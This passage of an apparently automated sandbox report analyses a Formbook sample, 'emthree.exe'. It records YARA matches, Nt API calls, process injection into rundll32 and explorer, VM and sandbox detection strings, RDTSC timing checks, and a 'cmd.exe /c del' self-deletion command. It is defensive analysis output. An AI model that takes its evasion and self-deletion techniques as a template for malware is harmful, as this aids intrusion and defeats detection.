          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9670 NtQueryInformationProcess,6_2_04EE9670
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9610 NtEnumerateValueKey,6_2_04EE9610
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE97A0 NtUnmapViewOfSection,6_2_04EE97A0
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9760 NtOpenProcess,6_2_04EE9760
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EEA770 NtOpenThread,6_2_04EEA770
          Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 6_2_04EE9770 NtSetInformationFile,6_2_04EE9770
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9730 NtQueryVirtualMemory,6_2_04EE9730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EEA710 NtOpenProcessToken,6_2_04EEA710
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE98F0 NtReadVirtualMemory,6_2_04EE98F0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE98A0 NtWriteVirtualMemory,6_2_04EE98A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EEB040 NtSuspendThread,6_2_04EEB040
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9820 NtEnumerateKey,6_2_04EE9820
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE99D0 NtCreateProcessEx,6_2_04EE99D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9950 NtQueueApcThread,6_2_04EE9950
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A80 NtOpenDirectoryObject,6_2_04EE9A80
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A20 NtResumeThread,6_2_04EE9A20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A00 NtProtectVirtualMemory,6_2_04EE9A00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A10 NtQuerySection,6_2_04EE9A10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EEA3B0 NtGetContextThread,6_2_04EEA3B0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9B00 NtSetValueKey,6_2_04EE9B00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA070 NtClose,6_2_02DAA070
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA120 NtAllocateVirtualMemory,6_2_02DAA120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DA9FF0 NtReadFile,6_2_02DA9FF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DA9F40 NtCreateFile,6_2_02DA9F40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA06B NtClose,6_2_02DAA06B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA03A NtReadFile,6_2_02DAA03A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04EAB150 appears 133 times
          Source: C:\Users\user\Desktop\emthree.exeCode function: String function: 00FEB150 appears 124 times
          Source: emthree.exeBinary or memory string: OriginalFilename vs emthree.exe
          Source: emthree.exe, 00000000.00000002.238716419.00000000016B0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs emthree.exe
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs emthree.exe
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs emthree.exe
          Source: emthree.exe, 00000001.00000002.276207579.0000000000BBB000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs emthree.exe
          Source: emthree.exe, 00000001.00000002.276372802.00000000010DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs emthree.exe
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dll
          Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: emthree.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/3
          Source: C:\Users\user\Desktop\emthree.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\emthree.exe.log
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_01
          Source: C:\Users\user\Desktop\emthree.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\emthree.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: emthree.exeMetadefender: Detection: 35%
          Source: emthree.exeReversingLabs: Detection: 64%
          Source: unknownProcess created: C:\Users\user\Desktop\emthree.exe 'C:\Users\user\Desktop\emthree.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\emthree.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\emthree.exeProcess created: C:\Users\user\Desktop\emthree.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\emthree.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: emthree.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: emthree.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: emthree.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: emthree.exe, 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: emthree.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: emthree.exe, 00000001.00000002.276125323.0000000000AF0000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: emthree.exe, 00000001.00000002.276125323.0000000000AF0000.00000040.00000001.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: emthree.exe, Cycle_Jump_Game/Main.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.emthree.exe.f40000.0.unpack, Cycle_Jump_Game/Main.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.emthree.exe.f40000.0.unpack, Cycle_Jump_Game/Main.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.emthree.exe.460000.0.unpack, Cycle_Jump_Game/Main.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.emthree.exe.460000.1.unpack, Cycle_Jump_Game/Main.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stamp
          Source: initial sampleStatic PE information: 0xCD1766EF [Fri Jan 13 19:15:59 2079 UTC]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041D0E2 push eax; ret 1_2_0041D0E8
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041D0EB push eax; ret 1_2_0041D152
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041D095 push eax; ret 1_2_0041D0E8
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041D14C push eax; ret 1_2_0041D152
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_004082B3 push ebp; ret 1_2_004082B6
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0040E404 push edx; ret 1_2_0040E40F
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041ECE9 push esp; ret 1_2_0041ECEA
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0103D0D1 push ecx; ret 1_2_0103D0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EFD0D1 push ecx; ret 6_2_04EFD0E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02D982B3 push ebp; ret 6_2_02D982B6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAD0EB push eax; ret 6_2_02DAD152
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAD0E2 push eax; ret 6_2_02DAD0E8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAD095 push eax; ret 6_2_02DAD0E8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAD14C push eax; ret 6_2_02DAD152
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAECE9 push esp; ret 6_2_02DAECEA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02D9E404 push edx; ret 6_2_02D9E40F
          Source: initial sampleStatic PE information: section name: .text entropy: 7.70662287757

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xEA
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3
          Source: Yara match File source: 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: emthree.exe PID: 4600, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\emthree.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\emthree.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000002D998E4 second address: 0000000002D998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000002D99B5E second address: 0000000002D99B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\emthree.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\emthree.exe Window / User API: threadDelayed 368
          Source: C:\Users\user\Desktop\emthree.exe Window / User API: threadDelayed 820
          Source: C:\Users\user\Desktop\emthree.exe TID: 4612 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\Desktop\emthree.exe TID: 6000 Thread sleep time: -41500s >= -30000s
          Source: C:\Users\user\Desktop\emthree.exe TID: 2872 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1268 Thread sleep count: 35 > 30
          Source: C:\Windows\explorer.exe TID: 1268 Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp Binary or memory string: VMware
          Source: explorer.exe, 00000002.00000000.260477578.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000002.494634416.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000000.241832967.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.260992522.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.253126007.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.260992522.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp Binary or memory string: VMware
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\emthree.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\emthree.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0040ACD0 LdrLoadDll,1_2_0040ACD0
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE58EC mov eax, dword ptr fs:[00000030h] 1_2_00FE58EC
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01012581 mov eax, dword ptr fs:[00000030h]1_2_01012581
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101FD9B mov eax, dword ptr fs:[00000030h]1_2_0101FD9B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101FD9B mov eax, dword ptr fs:[00000030h]1_2_0101FD9B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010135A1 mov eax, dword ptr fs:[00000030h]1_2_010135A1
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B05AC mov eax, dword ptr fs:[00000030h]1_2_010B05AC
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B05AC mov eax, dword ptr fs:[00000030h]1_2_010B05AC
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01011DB5 mov eax, dword ptr fs:[00000030h]1_2_01011DB5
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01011DB5 mov eax, dword ptr fs:[00000030h]1_2_01011DB5
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01011DB5 mov eax, dword ptr fs:[00000030h]1_2_01011DB5
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]1_2_01066DC9
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]1_2_01066DC9
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]1_2_01066DC9
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov ecx, dword ptr fs:[00000030h]1_2_01066DC9
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]1_2_01066DC9
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]1_2_01066DC9
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]1_2_010AFDE2
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]1_2_010AFDE2
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]1_2_010AFDE2
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]1_2_010AFDE2
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01098DF1 mov eax, dword ptr fs:[00000030h]1_2_01098DF1
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B740D mov eax, dword ptr fs:[00000030h]1_2_010B740D
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B740D mov eax, dword ptr fs:[00000030h]1_2_010B740D
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B740D mov eax, dword ptr fs:[00000030h]1_2_010B740D
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]1_2_010A1C06
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]1_2_01066C0A
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]1_2_01066C0A
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]1_2_01066C0A
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]1_2_01066C0A
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]1_2_00FFD5E0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]1_2_00FFD5E0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101BC2C mov eax, dword ptr fs:[00000030h]1_2_0101BC2C
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A44B mov eax, dword ptr fs:[00000030h]1_2_0101A44B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107C450 mov eax, dword ptr fs:[00000030h]1_2_0107C450
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107C450 mov eax, dword ptr fs:[00000030h]1_2_0107C450
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100746D mov eax, dword ptr fs:[00000030h]1_2_0100746D
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]1_2_00FE2D8A
